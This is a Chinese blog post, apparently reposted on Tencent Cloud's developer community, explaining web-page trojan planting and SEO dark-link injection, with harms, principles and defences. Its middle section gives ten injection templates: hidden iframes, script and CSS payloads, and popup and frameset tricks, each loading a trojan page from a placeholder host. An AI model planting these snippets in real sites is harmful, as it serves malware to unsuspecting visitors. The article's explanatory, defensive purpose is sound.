前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >如何检测网站有没有被挂黑链_检测平台

如何检测网站有没有被挂黑链_检测平台

作者头像
全栈程序员站长
发布于 2022-11-10 03:15:24
发布于 2022-11-10 03:15:24
2.3K0
举报

大家好,又见面了,我是你们的朋友全栈君。

网页挂马及暗链检测

什么是网页挂马 网页挂马是指恶意攻击者攻击WEB网站后,在网页中嵌入一段代码或脚本,用于自动下载带有特定目的木马程序,而恶意攻击者实施恶意代码或脚本植入的行为通常称为“挂马”。 什么是SEO暗链 SEO暗链是SEO黑帽手法中相当普遍的一种手段。笼统地说,它就是指一些人用非正常的手段获取其他网站的权限后,修改其网站的源代码,加入指向自己网站的反向链接代码。其目的是优化自己网站中的一些关键字在搜索引擎中的排名,或是提高自己网站的搜索引擎权重。 暗链实例: TR-201202-0002

近日发现多家使用ECSHOP开源程序(多个版本)的网站首页被篡改,被插入seo暗链的恶意代码。使用ecshop的用户多数为了优化“ugg”关键字,请自行进行检查。 检查方法: 打开网站主页,右键查看网站源码,搜索“ugg”。 网页挂马的危害 对于网站本身来说,网页挂马的危害有三: 1、成为木马“傀儡同伙”,影响网站声誉及公众形象; 2、经济损失; 3、系统资源损失巨大; 对客户端来说,敏感信息被盗,如银行账号,娱乐所用的游戏账号及其他社交账号等,严重影响被种植客户端的用户工作和生活;此外,还有可能被利用作为攻击其他被害者的攻击源,给真正的攻击者顶黑锅。 网页挂马的原理 网页挂马的基本原理是利用了操作系统漏洞、浏览器漏洞(各种以IE为核心的浏览器被攻击的可能性最高,由市场占有率决定)、浏览器相关插件的漏洞(比如Flash、adobe acrobat等,非常多见)。这些漏洞往往可以造成缓冲区溢出和权限提升,漏洞被利用,就可以执行攻击者设定的任意代码。 常见的挂马类型 框架挂马、js文件挂马、js变形加密、body挂马、隐蔽挂马、css中挂马、JAVA挂马、图片伪装、伪装调用、高级欺骗等。 挂马实例: 1、框架挂马

<iframe src=地址 width=0 height=0></iframe>

2、js文件挂马 首先将以下代码

document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”);

保存为xxx.js, 则JS挂马代码为

<script language=javascript src=xxx.js></script>

3、js变形加密

<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀 4、body挂马 <body ></body> 5、隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML ‘\r\n<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;

6、css中挂马

body { background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}

7、javascript挂马

<SCRIPT language=javascript> window.open (“地址”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″); </script>

8、图片伪装

<html> <iframe src=”网马地址” height=0 width=0></iframe> <img src=”图片地址”></center> </html>

9、伪装调用

<frameset rows=”444,0″ cols=”*”> <frame src=”打开网页” framborder=”no” scrolling=”auto” noresize marginwidth=”0″ margingheight=”0″> <frame src=”网马地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″> </frameset>

10、高级欺骗

<a href=”http://www.xxx.com(迷惑连接地址,显示这个地址指向木马地址)” > 页面要显示的内容 </a> <SCRIPT Language=”JavaScript”> function www_163_com () { var url=”网马地址”; open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″); }

如何防御网页挂马 预防网页被挂马建议养成如下好习惯: 1、最好不要随便浏览信誉度不高的网站; 2、下载网上资源最好到比较可信的资源网站下载; 3、经常更新杀毒软件病毒库; 4、为系统及应用软件打补丁。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/189078.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月26日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
前端安全 — 浅谈JavaScript拦截XSS攻击
XSS/跨站脚本攻击,是一种代码注入网页攻击,攻击者可以将代码植入到其他用户都能访问到的页面(如论坛、留言板、贴吧等)中。
天存信息
2021/06/15
5.1K0
前端安全 — 浅谈JavaScript拦截XSS攻击
网页如何挂马的是如何实现的
从“挂马”这个词中就知道,它和“木马”脱离不了关系,的确,挂马的目的就是将木马传播出去。
知识与交流
2021/04/02
5.1K0
网页如何挂马的是如何实现的
色情网站的光棍节“福利”:加密式挂马玩转流氓推广
双十一前夜,还想着通过同城交友或是某些不可描述的网站一解单身的烦恼?别急,不妨先来看看这些网站给光棍发的“福利”! 最近,360安全中心监测到一起网站弹窗广告挂马事件,弹出的网络广告出现挂马,广告内容以同城交友等伪装色情诱惑信息为主,通过对整个挂马攻击的过程分析发现该挂马脚本以及攻击负载(Payload) 在通过中招者网络时进行加密,并在最后阶段通过进行解密执行。攻击负载甚至还利用regsrv32 实用程序执行一个.sct文件来绕过AppLocker 的脚本规则。 下面就对该挂马木马进行简单分析: 通过监控
昨天50还没用完
2018/06/29
6.2K0
javascript伪协议解析
首先来介绍一下这个伪协议,JavaScript伪协议最重要的,其实就是可以用来执行js的代码,哪些地方可以用呢,
网e渗透安全部
2024/02/21
4820
javascript伪协议解析
记一次被中间人攻击的经历
俗话说得好,常在河边走,哪能不湿鞋?俗话又说了,出来混,早晚要还的。只是没想到自己还的这么快。就在之前的几篇关于MITM的笔记兼科普文刚发布不久,我自己就遭遇了一次中间人攻击。无奈由于技不如人,当时花了两天都没找到原因。不过吃一堑长一智,虽然丢了点个人信息,但总算明白了对方的手法。在此记录一下当时的排查过程,就当是为自己作个提醒吧。
evilpan
2023/02/12
5420
记一次被中间人攻击的经历
学习记录03(网页挂马)
大家好,又见面了,我是你们的朋友全栈君。 网页挂马 将木马程序上传到网站,使用木马生成器生成一个网马,放到网页空间,在添加代码使木马在网页打开时运行 1.常见的几种方式 将木马伪装成页面元素,木马被浏览器自动加载到本地 利用脚本运行的漏洞下载木马 利用脚本运行的漏洞释放隐含在网页脚本中的木马 将木马伪装成缺失的组件。或和缺失的组件绑在一起(flash播放插件等) 通过脚本运行调用某些com组件,利用其漏洞下载木马 在渲染页面内容的过程中利用格式溢出释放木马(ani格式溢出漏洞等) 在渲染页面内容的过程
全栈程序员站长
2022/11/11
2.3K0
学习记录03(网页挂马)
暗链隐藏的N种姿势
一、介绍 暗链也称黑链,即隐蔽链接,是黑帽SEO的作弊手法之一,其目的就是利用高权重网站外链来提升自身站点排名。 一般来说,暗链是由攻击者入侵网站后植入的,暗链在网页页面上不可见或者极易被忽
FB客服
2018/02/26
5.4K0
暗链隐藏的N种姿势
实验 | 使用手机微信配合点击劫持漏洞进行钓鱼
钓鱼攻击一般指钓鱼式攻击。钓鱼式攻击是指企图从电子通讯中,通过伪装成信誉卓著的法人媒体以获得如用户名、密码和信用卡明细等个人敏感信息的犯罪诈骗过程。
FB客服
2021/08/24
6280
网站挂马原理及实战
网页挂马简介 网页挂马指的是把一个木马程序上传到一个网站里面,然后用木马生成器生成一个网马,放到网页空间里面,再加代码使得木马在打开网页时运行。
黑白天安全
2020/03/08
6.2K0
点击劫持漏洞的学习及利用之自己制作页面过程
该文章首发于:奇安信攻防社区 https://forum.butian.net/share/436
亿人安全
2022/06/30
2.3K0
点击劫持漏洞的学习及利用之自己制作页面过程
另类SEO分享:利用JS封装iframe躲过搜索引擎的抓取
前言:很多博友不仔细看完内容就直接认为用 iframe 不好之类的云云,而实际上本文就是教你在必须使用 iframe 的时候,该如何躲过搜索引擎的抓取,避免不利于 SEO 的情况! 那么,何为“必须要用 iframe 的时候”?我举个简单的例子:一些主题分享网站,很多时候会使用 iframe 框架调用主题作者的网站来做主题演示,这时候就会产生大量的 iframe 框架,那么本文的方法就可以派上用场了! 导读:了解一点 seo 的站长,应该都知道爬虫都不喜欢 iframe 或 frame,因为蜘蛛访问一个网址
张戈
2018/03/23
3K0
另类SEO分享:利用JS封装iframe躲过搜索引擎的抓取
苹果cms漏洞POC原理分析与V8 V10被挂马解决办法分享
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>,尤其电影片名d_name值被直接篡改,并且是批量挂马,导致用户打开网站访问直接弹窗广告并跳转。
网站安全专家
2020/01/15
1.5K0
苹果cms漏洞POC原理分析与V8 V10被挂马解决办法分享
干货笔记!一文讲透XSS(跨站脚本)漏洞
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途。
网络安全自修室
2022/03/30
4.3K0
干货笔记!一文讲透XSS(跨站脚本)漏洞
常见六大 Web 安全攻防解析
XSS (Cross-Site Scripting),跨站脚本攻击,因为缩写和 CSS重叠,所以只能叫 XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。
小生方勤
2019/06/01
7630
被网页挂马攻击的几个要素_网站挂马检测工具箱书籍
网马的本质是一个特定的网页,这个网页包含了攻击者精心构造的恶意代码,这些恶意代码通过利用浏览器(包括控件、插件)的漏洞,加载并执行攻击者指定的恶意软件(通常是木马)。 网站挂马是黑客植入木马的一种主要手段。黑客通过入侵或者其他方式控制了网站的权限,在网站的Web页面中插入网马,用户在访问被挂马的网站时也会访问黑客构造的网马,网马在被用户浏览器访问时就会利用浏览器或者相关插件的漏洞,下载并执行恶意软件。其本质是利用浏览器和浏览器控件、插件的漏洞,通过触发漏洞获取到程序的执行权限,执行黑客精心构造的shellcode。
全栈程序员站长
2022/11/19
3.2K0
竞争激烈的互联网时代,是否需要注重一下WEB安全?
一直以来自己对WEB安全方面的知识了解的比较少,最近有点闲工夫了解了一下。也是为了以后面试吧,之前就遇到过问WEB安全方面的问题,答的不是很理想,所以整理了一下!
拾贰
2019/08/28
7620
竞争激烈的互联网时代,是否需要注重一下WEB安全?
XSS跨站脚本攻击剖析与防御(跨站脚本攻击漏洞怎么修复)
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!
全栈程序员站长
2022/08/02
7K0
XSS跨站脚本攻击剖析与防御(跨站脚本攻击漏洞怎么修复)
前端安全编码规范
随着互联网高速的发展,信息安全已经成为企业重点关注焦点之一,而前端又是引发安全问题的高危据点,所以,作为一个前端开发人员,需要了解前端的安全问题,以及如何去预防、修复安全漏洞。下面就以前端可能受到的攻击方式为起点,讲解web中可能存在的安全漏洞以及如何去检测这些安全漏洞,如何去防范潜在的恶意攻击。
coder_koala
2020/12/07
1.4K0
前端安全编码规范
一文了解XSS漏洞和常见payload
刷完了XSS challenge和XSS game 对XSS漏洞有了些许认识 在此做个小结与记录
红客突击队
2022/09/30
3.8K0
一文了解XSS漏洞和常见payload
聊一聊前端面临的安全威胁与解决对策
前端安全是指用于保护您的网络应用程序/网站客户端免受威胁和漏洞的技术或实践。防止未经授权的访问、数据泄漏和恶意活动对您的网络应用程序整体完整性的影响非常重要。您的前端可能会受到多种攻击,例如跨站点脚本(XSS),它会将恶意脚本注入您的网络应用程序,以针对其用户。还有其他前端威胁,例如跨站点请求伪造、点击劫持等等。如果没有适当的措施,您的网络应用程序将容易受到大多数这些威胁的攻击。让我们深入探讨!
前端达人
2023/11/15
5800
聊一聊前端面临的安全威胁与解决对策
相关推荐
前端安全 — 浅谈JavaScript拦截XSS攻击
更多 >
领券
社区富文本编辑器全新改版!诚邀体验~
全新交互,全新视觉,新增快捷键、悬浮工具栏、高亮块等功能并同时优化现有功能,全面提升创作效率和体验
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文